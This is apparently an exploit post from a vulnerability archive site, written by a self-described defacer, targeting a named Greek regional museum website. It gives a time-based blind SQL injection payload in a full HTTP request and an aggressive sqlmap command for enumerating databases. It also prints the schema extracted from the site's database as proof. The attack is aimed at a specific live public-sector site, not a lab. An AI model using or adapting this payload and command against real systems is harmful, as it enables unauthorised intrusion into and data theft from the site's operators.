Greece Museum CMS SQL Injection

2020.06.16
tm At0m (TM) tm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################### # Exploit Title : larmouseia.thessaly.gov.gr blind sql inj vuln # Author [ Discovered By ] : At0m - Turkish Defacer and Bug Resarcher # Tested On : Windows and Linux # file.txt : GET /foto_mouseio.php?PId=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://larmouseia.thessaly.gov.gr/ Cookie: PHPSESSID=374941e7f62501d7ae853771458e0d2f Host: larmouseia.thessaly.gov.gr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* #command: python sqlmap.py -r file.txt --level=5 --risk=3 --tamper=space2comment --dbs --batch # Contact / skype : at0munderground@gmail.com Database: MouseiaLar Table: Mouseio [16 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | HistoryEl | varchar(255) | | HistoryEn | varchar(255) | | IconEl | varchar(255) | | IconEn | varchar(255) | | InfoEl | text | | InfoEn | text | | LocEl | text | | LocEn | text | | MapEl | varchar(255) | | MapEn | varchar(255) | | Mouseio_Id | int(11) | | NameEl | varchar(255) | | NameEn | varchar(255) | | OrderBy | tinyint(4) | | PresEl | text | | PresEn | text | +------------+--------------+ ###################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top